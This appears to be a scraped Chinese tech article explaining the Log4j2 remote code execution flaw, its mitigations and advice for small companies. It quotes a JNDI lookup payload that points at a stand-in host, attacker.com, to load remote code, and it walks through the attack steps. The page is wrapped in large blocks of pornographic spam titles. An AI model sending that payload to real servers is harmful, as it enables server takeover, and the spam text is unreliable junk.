精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Log4j史詩級漏洞,我們這些小公司能做些什么?

安全 漏洞
12月10日,看到朋友圈中已經有人在通宵修改、上線系統了。隨即,又看到阿里云安全、騰訊安全部門發出的官方報告:”Apache Log4j2存在遠程代碼執行漏洞“,且漏洞已對外公開。

 [[439896]]

事件背景

12月10日,看到朋友圈中已經有人在通宵修改、上線系統了。隨即,又看到阿里云安全、騰訊安全部門發出的官方報告:”Apache Log4j2存在遠程代碼執行漏洞“,且漏洞已對外公開。

看到相關消息,馬上爬起來把所有項目的日志系統過濾一遍,還好老項目采用的log4j,新項目采用的logback,沒有中招。隨后就看到朋友圈鋪天蓋地的相關消息。

作為一個史詩級的事件,緊急修改漏洞是必然的。作為程序員,如果看到這則消息,連去核查一下系統都做不到,那真的不是一個合格的程序員。

經歷過這次事件,不僅是看熱鬧而已,還要思考一下,作為小公司如何避免、提前預防、做好準備應對這類Bug。

漏洞描述

Apache Log4j2是一款優秀的Java日志框架,與Logback平分秋色,大量主流的開源框架采用了Log4j2,像Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影響。所以,這樣一個底層框架出現問題,影響面可想而知。

漏洞信息:Apache Log4j 2.15.0-rc1 版本存在漏洞繞過,需及時更新至 Apache Log4j 2.15.0-rc2 版本。

影響范圍:2.0 <= Apache log4j2 <= 2.14.1。

最新修復版本:https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

補救方案

方案一:升級版本,發布系統;

方案二:臨時補救:

  • 修改JVM參數,設置 -Dlog4j2.formatMsgNoLookups=true。
  • 在涉及漏洞的項目的類路徑(classpath)下增加log4j2.component.properties配置文件并增加配置項log4j2.formatMsgNoLookups=true。
  • 將系統環境變量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 設置為 true。

攻擊原理

攻擊偽代碼示例:

  1. import org.apache.log4j.Logger; 
  2.  
  3. import java.io.*; 
  4. import java.sql.SQLException; 
  5. import java.util.*; 
  6.  
  7. public class VulnerableLog4jExampleHandler implements HttpHandler { 
  8.  
  9.   static Logger log = Logger.getLogger(log4jExample.class.getName()); 
  10.  
  11.   /** 
  12.    * 示例偽代碼:一個簡單的HTTP端點,其中讀取User Agent信息并進行日志記錄; 
  13.    */ 
  14.   public void handle(HttpExchange he) throws IOException { 
  15.    // 獲取user-agent信息 
  16.     String userAgent = he.getRequestHeader("user-agent"); 
  17.      
  18.     // 此行記錄日志的代碼,通過記錄攻擊者控制的HTTP用戶代理標頭來觸發RCE。 
  19.     // 攻擊者可以設置他們的User-Agent header到${jndi:ldap://attacker.com/a} 
  20.     log.info("Request User Agent:" + userAgent); 
  21.  
  22.     String response = "<h1>Hello There, " + userAgent + "!</h1>"
  23.     he.sendResponseHeaders(200, response.length()); 
  24.     OutputStream os = he.getResponseBody(); 
  25.     os.write(response.getBytes()); 
  26.     os.close(); 
  27.   } 

基于上述代碼的基本攻擊步驟:

  • 請求對應的HTTP端點(或接口),在請求信息中攜帶攻擊代碼(比如,在user-agent中攜帶${jndi:ldap://attacker.com/a});
  • 服務器在通過Log4j2執行日志記錄時,記錄中包含了基于JNDI和LDAP的惡意負載${jndi:ldap://attacker.com/a},其中attacker.com是攻擊者控制的地址。
  • 記錄日志操作觸發向攻擊者控制的地址發送請求。
  • 對應請求返回在響應中返回可執行的惡意代碼,注入到服務器進程當中。比如返回,https://attacker.com/Attack.class 。
  • 進而執行腳本控制服務器。

騰訊安全專家的復現如下:

log4j2漏洞復現

小公司程序員能做些什么?

關于漏洞及解決方案,上面已經詳細聊了,問題基本得以解決。在大的互聯網企業,是有專門的安全運維部門來監控、掃描這些漏洞的。但在小公司,很顯然沒有這樣的條件。

那么,我們該怎么辦?同時,作為事件的經歷者,你是否思考過這個事件中反映出的一些其他問題嗎?

第一,是否第一時間得到消息?

在大企業,一旦發現這樣的漏洞,安全部門會第一時間進行通知。但在小企業,沒有安全部門,你是如何獲取到漏洞的消息的呢?

比如我所在的企業,是沒有安全部門的,但也幾乎是第一時間得知漏洞消息,進行系統排查的。

作為程序員,如果漏洞消息已經爆出很久,你卻一無所知,那就應該反思一下朋友圈的質量以及對技術熱點的關注度問題了。

如何獲得圈內第一手消息,取決于也反映著你在社交圈或技術圈所處的位置與現狀。

第二,是否置若罔聞?

很多朋友可能也看到了這則漏洞消息,但也就是看一下熱鬧,然后該干嘛干嘛了,系統有漏洞就有漏洞了唄~

如果你是如此,或你的團隊是如此,你真的需要反省一下職業素養問題了。

很多人可能覺得自己很牛,覺得自己懷才不遇,覺得工資收入低,覺得被虧待……那么,對照一下對這件事所作出的反應,基本就知道自己是不是被虧待了。

第三,如何應對突發事件?

這樣的突發事件,也是對系統運維、團隊管理的一個考驗,也是一個仿真練習:大家都正在進行著當前業務的開發,有一個突發Bug要修改,改一半的代碼如何操作?如大面積發布?

第一,改一半的代碼怎么辦?如果你的團隊的代碼開發都是基于master(主干)進行開發、提交代碼,針對這樣的突發事件,必然會面對改了一半的代碼,提交了,想一起發布但還沒測試,這種騎虎難下的局面。

所以,代碼的管理(如何打分支、合并分支、分支與主干代碼不同環境的發布)必須得從日常的點滴做起,當突發事件發生時,也不至于手忙腳亂。

第二,有大量項目需要發布怎么辦?當然,最古老的方式就是一個系統一個系統手動發布。如果是微服務及應用較多,不僅容易出現錯誤,而且耗時較長。這就提醒我們,構建自動化發布流程的重要性。

第四,怎么找出系統漏洞?

有安全部門的公司,會定期掃描系統漏洞,那么沒有安全部門的公司只能坐以待斃嗎?

其實,還是有一些方法可以發現系統的一些漏洞的。比如,勤關注使用框架的版本升級、利用三方提供的漏洞掃描(比如阿里云服務器的安全掃描)、與同行交流等手段。

小結

任何一個漏洞對軟件系統來說都有可能是致命的,也需要我們謹慎對待的。對于漏洞的處理及做出的反應也是從業者職業素養的體現。

而如果能從一次次突發事件中學習、思考到更多內容,你將比別人更快的成長。

責任編輯:武曉燕 來源: 程序新視界
相關推薦

2022-05-30 14:04:23

Log4j遠程代碼漏洞

2021-12-13 01:49:34

漏洞Log4j代碼

2021-12-13 06:56:46

漏洞Log4j對象

2022-03-25 13:42:15

Log4j漏洞網絡安全

2021-12-11 19:04:38

漏洞

2021-12-23 09:47:36

Log4jRCE漏洞DoS漏洞

2022-03-30 11:29:53

漏洞補丁Spring

2021-12-14 23:44:26

漏洞Log4j項目

2021-12-24 09:52:31

Traefik Log4J 漏洞

2022-01-24 10:02:53

漏洞微軟網絡攻擊

2021-12-23 11:03:25

Log4j 漏洞漏洞

2022-01-10 11:54:54

FTCLog4j聯邦貿易委員會

2022-01-06 09:52:39

Log4j漏洞攻擊

2023-11-10 10:08:23

2022-01-02 07:07:55

CISAApache Log4漏洞

2021-12-22 16:53:31

Log4jLog4j庫零日漏洞

2021-12-29 14:47:43

Apache團隊Log4j漏洞

2021-12-16 12:27:15

Log4j漏洞網絡安全

2021-12-21 14:25:01

Log4j2漏洞網絡

2022-02-15 17:51:38

Log4j漏洞網絡安全
點贊
收藏

51CTO技術棧公眾號

亚洲电影成人av99爱色| 久久久久久久av麻豆果冻| 日韩中文字幕在线播放| 亚洲无在线观看| heyzo高清国产精品| 久久久综合激的五月天| 国产日产欧美a一级在线| 日本天堂中文字幕| 美女毛片一区二区三区四区最新中文字幕亚洲| 91久久精品一区二区三| 影音先锋成人资源网站| 美州a亚洲一视本频v色道| 精品一区二区久久| 69**夜色精品国产69乱| 天堂av网手机版| 国产精品美女在线观看直播| 欧美少妇bbb| 精品无码一区二区三区在线| 日本在线看片免费人成视1000| 丁香桃色午夜亚洲一区二区三区| 国产精品jizz在线观看麻豆| 国产一卡二卡在线播放| 日韩一区电影| 亚洲香蕉伊综合在人在线视看 | 欧美aaa免费| 国产欧美日韩在线看| 国产精品久久久久久久小唯西川 | 日韩免费观看高清完整版| aaaaaa亚洲| 鲁鲁在线中文| 一区二区久久久久| 国产精品jizz在线观看老狼| 国产区视频在线播放| 99视频一区二区| 99re国产| 国产黄色大片网站| 精品影院一区二区久久久| 国产成人久久久精品一区| 男人的天堂一区二区| 亚洲欧美伊人| 欧美大片免费看| 日本黄色小说视频| 久久久人成影片免费观看| 少妇久久久久久| wwwww黄色| 精品日产免费二区日产免费二区| 亚洲精品之草原avav久久| 国产真实乱人偷精品| 亚洲欧美日本国产| 欧美性一二三区| 国产一级特黄a大片免费| 美女18一级毛片一品久道久久综合| 亚洲综合在线第一页| www.黄色网址.com| 污片视频在线免费观看| 亚洲精品精品亚洲| 黄色小视频大全| 呦呦在线视频| 亚洲va国产va欧美va观看| 六月婷婷在线视频| 高清视频在线观看三级| 天天av天天翘天天综合网 | 久久久久久一区| 日本激情视频网站| 91免费观看视频| 欧美一区二区在线| p色视频免费在线观看| 国产精品免费观看视频| 国产精品99久久久久久大便| mm1313亚洲国产精品美女| 亚洲女子a中天字幕| 强开小嫩苞一区二区三区网站| 成人看av片| 亚洲一区在线视频| 一区二区传媒有限公司| 在线男人天堂| 欧美性受xxxx黑人xyx性爽| 日韩av片专区| 亚洲精品国产九九九| 亚洲国产精品成人av| 黄色aaa视频| 国产精品99视频| 欧美激情乱人伦| 国产高清中文字幕| 免费在线观看视频一区| 亚洲在线一区二区| 亚洲三区在线观看无套内射| 欧美韩国日本一区| 成人av在线播放观看| 少妇视频一区| 欧美日韩国产经典色站一区二区三区| japan高清日本乱xxxxx| 天堂综合网久久| 中文字幕亚洲一区二区三区| 久久久综合久久| 久久精品一区二区国产| 成人做爰www免费看视频网站| 粉嫩av一区二区夜夜嗨| 国产日韩三级在线| 17c丨国产丨精品视频| 欧美成人精品三级网站| 精品国产亚洲在线| 人妻无码一区二区三区免费| 精品999网站| 国产精品吴梦梦| 深夜福利视频网站| 国产精品不卡一区| 国产黄色一级网站| 国产一区二区av在线| 亚洲精品永久免费精品| 欧美被狂躁喷白浆精品| 日本不卡不码高清免费观看| 精品久久精品久久| av在线播放国产| 欧美伊人久久久久久久久影院| av电影在线播放| 国产精品国产一区| 日韩美女av在线免费观看| 亚洲精品一区二区三区四区| 欧美激情一区二区三区不卡| 日本免费不卡一区二区| 亚洲**毛片| 日韩亚洲国产中文字幕| 无码无套少妇毛多18pxxxx| 国产成人精品三级| 超碰成人在线免费观看| 欧美xnxx| 亚洲视频网站在线观看| 久草手机在线观看| 成人一区二区三区在线观看| 9l视频自拍9l视频自拍| 国产精品66| 国产一区二区av| 中文字幕国产在线观看| 99久久国产综合色|国产精品| 国产欧美自拍视频| www.欧美| 久久伊人免费视频| 91九色蝌蚪91por成人| 亚洲国产精品激情在线观看| 999香蕉视频| 猛男gaygay欧美视频| 18久久久久久| 亚洲色图狠狠干| 色综合久久综合网欧美综合网| 日本道中文字幕| 亚洲青涩在线| 国内成+人亚洲| 国产va在线视频| 亚洲精品国产福利| 97久久久久久久| 91麻豆国产福利在线观看| aa在线观看视频| 欧亚精品一区| 欧美一级黄色网| 黄色的视频在线免费观看| 91国偷自产一区二区三区观看 | 精品国产伦一区二区三| 玉足女爽爽91| 天堂www中文在线资源| 激情久久久久| 久久精品日韩| 91欧美精品| 日韩视频在线观看免费| 国产wwwwwww| 亚洲成人av福利| 久操视频免费看| 卡一卡二国产精品| 亚洲色婷婷久久精品av蜜桃| 白白在线精品| 日本久久久久久久久久久| jizzjizz在线观看| 日韩一区二区免费视频| 日韩成人免费在线视频| 久久夜色精品一区| 日本超碰在线观看| 欧美黄色精品| 欧美成人综合一区| 日韩一区二区三区四区五区| 欧美—级a级欧美特级ar全黄| 天天综合天天综合| 在线欧美日韩精品| 美女毛片在线观看| 久久一二三国产| 国产人妻精品久久久久野外| 亚洲青涩在线| 亚洲一区不卡在线| 国产成人澳门| 国产精品女人久久久久久| 秋霞在线视频| 国产性猛交xxxx免费看久久| 国产高清免费观看| 色哟哟一区二区三区| 亚洲欧洲综合网| 不卡一区二区三区四区| 国产九九热视频| 99在线热播精品免费99热| 亚洲一卡二卡三卡| 男人的天堂久久| 国产日韩欧美成人| 蜜桃视频m3u8在线观看| xxxxx91麻豆| 日本福利片高清在线观看| 欧美一区二区三区播放老司机| 久热这里只有精品6| 亚洲毛片av在线| 69精品无码成人久久久久久| 成人综合在线观看| 国产探花在线看| 久久中文在线| 无码人妻少妇伦在线电影| 久久免费精品视频在这里| 国产一区自拍视频| 日韩免费一级| 国产日韩精品一区二区| 欧美成人黑人| 国内偷自视频区视频综合| 精品自拍一区| 在线观看日韩欧美| 视频一区二区三区在线看免费看| 91精品一区二区三区久久久久久 | 国产在线精品一区在线观看麻豆| 国产精品免费观看久久| 亚洲一级黄色| 日本a在线天堂| 久久久久国产精品| 亚洲 国产 欧美一区| 亚洲精品无吗| 精品国产一区二区三区四区精华| 99久久免费精品国产72精品九九| 亚洲精品欧美日韩| 91精品国产自产观看在线| 国产精品美女久久久久久免费| 成人美女大片| 欧美一区视频在线| 九色porny自拍视频在线播放| 欧美激情在线有限公司| 视频在线这里都是精品| 久久这里有精品视频| 蜜桃视频在线观看www社区 | 久草手机视频在线观看| 国产日韩av一区| xxxxx在线观看| 久久久久久久国产精品影院| 欧美做受高潮6| 国产色婷婷亚洲99精品小说| 国产精品毛片一区二区| 久久蜜臀精品av| 成人国产精品久久久网站| 国产香蕉久久精品综合网| 三级网站在线免费观看| 亚洲国产精品传媒在线观看| 91无套直看片红桃在线观看| 欧美国产国产综合| 国产三级精品三级观看| 亚洲摸摸操操av| 久久久久久久国产视频| 五月婷婷激情综合网| 日本一区二区三区精品| 色哦色哦哦色天天综合| japanese国产在线观看| 欧美日韩国产色站一区二区三区| 亚洲熟妇av乱码在线观看| 5858s免费视频成人| 国产日本精品视频| 精品美女一区二区三区| 日本一二三区在线视频| 在线视频欧美日韩精品| av在线网址观看| 97在线视频一区| 日本欧美韩国| 91在线精品视频| 里番精品3d一二三区| 日本公妇乱淫免费视频一区三区| 日韩极品一区| 国产乱子伦精品无码专区| 中文一区二区| 15—17女人毛片| 丰满放荡岳乱妇91ww| aa一级黄色片| 国产精品超碰97尤物18| 久久久久久久伊人| 色婷婷av一区| 999久久久久| 亚洲免费av网址| 黄色精品在线观看| 91精品国产99| 亚洲精品一区av| 精品一区久久| 亚洲综合专区| 18岁视频在线观看| 另类调教123区| 国产又黄又粗又猛又爽的视频| 国产无一区二区| 国产真实夫妇交换视频| 欧美性生活一区| 刘亦菲久久免费一区二区| 夜夜嗨av色一区二区不卡| 三级网站视频在在线播放| 国产成人91久久精品| 天堂久久av| 亚洲精品国产精品国自产观看| 国产精品a久久久久| 中文字幕欧美人妻精品一区| 成人高清av在线| 国产探花在线免费观看| 色偷偷88欧美精品久久久| 国产xxxx在线观看| 在线观看亚洲区| 在线视频cao| 国产精品一区二区三区观看| 97精品97| 在线观看免费黄网站| 96av麻豆蜜桃一区二区| 国产极品国产极品| 欧美日本国产一区| 男人的天堂av高清在线| 午夜精品一区二区三区在线视| 国产精品视频一区二区三区| 丝袜美腿玉足3d专区一区| 亚洲深夜影院| 国产精品熟妇一区二区三区四区| 国产精品你懂的在线| www.色国产| 精品丝袜一区二区三区| av免费不卡| 国产69精品久久久久9999apgf| 久久国产精品亚洲人一区二区三区| 激情综合在线观看| 99精品黄色片免费大全| 国产亚洲色婷婷久久99精品| 欧美丰满美乳xxx高潮www| 午夜毛片在线| 国产一区二区在线免费| 日韩欧美一区二区三区在线视频 | 在线视频1卡二卡三卡| 国产视频自拍一区| 国产在线看片免费视频在线观看| 国产91视觉| 国内精品久久久久久久影视麻豆| 永久看看免费大片| 亚洲人成7777| 99久久精品国产成人一区二区| 自拍偷拍亚洲在线| 日韩大陆av| 免费看av软件| 国产乱国产乱300精品| 麻豆国产尤物av尤物在线观看| 欧美一级高清片在线观看| 菠萝菠萝蜜在线视频免费观看| 亚洲在线免费看| 精品动漫av| 天堂久久久久久| 一本久久综合亚洲鲁鲁五月天 | 精品国产免费无码久久久| 欧美成aaa人片免费看| 亚洲成人五区| 我的公把我弄高潮了视频| 99久久精品免费看国产| 国产91精品一区| 亚洲图片在区色| 粉嫩91精品久久久久久久99蜜桃| 少妇特黄a一区二区三区| 久久精品国产免费看久久精品| 国精产品一区一区二区三区mba| 欧美一区二区三区免费大片| 波多野结依一区| 欧美高清性xxxxhd| 免费视频一区二区| 精品国产欧美日韩不卡在线观看| 精品剧情在线观看| 中文字幕 在线观看| 亚洲v日韩v欧美v综合| 国产一二精品视频| 国产精品xxxx喷水欧美| 国产亚洲激情在线| 国产在线视频欧美一区| 无罩大乳的熟妇正在播放| 国产偷国产偷亚洲高清人白洁| 亚洲综合网av| 久久久久久成人| 国产欧美一区二区精品久久久| 国产欧美一区二| 性感美女极品91精品| 福利视频在线播放| 91丨九色丨国产| 丝袜美腿亚洲综合| www.5588.com毛片| 亚洲欧美国产制服动漫| 青青伊人久久| 免费看又黄又无码的网站| 国产精品国产三级国产aⅴ入口 | 日韩一级理论片| 一区二区在线观看免费| 理论视频在线| 成人影片在线播放| 秋霞av亚洲一区二区三| 国产精品30p| 精品国产一区久久久| 欧美一区二区三区红桃小说|